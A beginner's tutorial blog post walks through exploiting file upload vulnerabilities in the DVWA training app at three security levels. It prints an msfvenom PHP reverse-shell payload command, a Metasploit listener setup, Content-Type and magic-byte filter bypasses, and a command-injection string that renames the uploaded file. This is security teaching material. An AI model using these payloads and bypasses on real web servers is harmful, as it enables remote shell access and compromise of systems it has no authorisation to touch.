Beginners guide to file upload vulnerability

In this article we will learn about file upload vulnerability and how we can use this vulnerability to get a session.


Table of content :

  1. Introduction

  2. Practical implementation on DVWA

Introduction

file upload vulnerability is a web based vulnerability that allows attackers to upload a malicious file directly and then and execute it via a web browser. In this article we will try this vulnerability on DVWA at different security levels and will try to get a session by executing the malicious file.


Practical implementation on DVWA


We will start with the low security level.open DVWA and then go to DVWA Security then select it as Low, then go to the file upload tab.

As we can see in the image that it is asking us to upload a file . So let's create our malicious file by using msfvenom.

command used : msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.43.9 lport=4444 -o /root/Desktop/haclabs.php

  • -p means payload to use

  • lhost is the listener address

  • lport is the listener port

  • -o is used to specify the path to save the file

Now choose the file and click on upload button.

we have uploaded the file successfully and ../ ../hackable/uploads/haclabs.php

is the path where the file is uploaded. We will use this path to execute our script.

But before that open metasploit and setup everything to get a session.

command used :

  • use exploit/multi/handler

  • set payload php/meterpreter/reverse_tcp

  • set lhost 192.168.43.9

  • set lport 4444

  • exploit

please change lhost and lport according to the ip address and port number you have provided while creating the mailicious php file.


now its time to execute the uploaded file .

copy and paste the path ../ ../hackable/uploads/haclabs.php in the URL and press enter.

We have a session and this is what we want.


Now change the security level to medium and by we will use the same php file to uplaod and to get the session.

Ok so after changing to medium level go to File upload tab and try to upload the same php file .

This time we failed to upload the file. we only accept JPEG or PNG images.

No problem , open burpsuite and intercept the request when we click on upload button.

Now change Content-Type : application/x-php to Content-Type : image/jpeg and click on Forward and then we can see file is uploaded.

after uploading the file we followed the same steps to get a session .

Done!!!


Now change security level to High and this time also we will try to upload the same file and we can see an error is displayed.


Now we tried the same method like medium level security but we get the same error . ok so no problem ,open haclabs.php and add GIF89a; in the starting of the file and save the file as haclabs.jpg

Now we will upload the file as haclabs.jpg.

Done we have uploaded the file successfully now its time to execute our file . but wait it's a jpg file and can't be executed . So after thinking a lot we found a solution that what if we use OS Command injection to rename the file as haclabs.php . To rename the file easily we change the security to low level and switch to the OS command injection tab and we use the command : 127.0.0.1;cd ..;cd ..;cd hackable;cd uploads;mv haclabs.jpg haclabs.php to rename the file.

now the file is renamed successfully and we execute it to get a session. we executed this file by using the same method as we have done in low and medium level security.


Done! we have a session now.


So this is how we use this vulnerability to get a session.we can think of more ways to bypass medium level and high level security . So if you know any other method then mail us the walkthrough at yash@haclabs.org

Subscribe to HacLabs newsletter

Get priority notification on the release of the latest articles.

  • YouTube
  • Twitter
  • Instagram
  • Linkedin

© 2020 by HacLabs.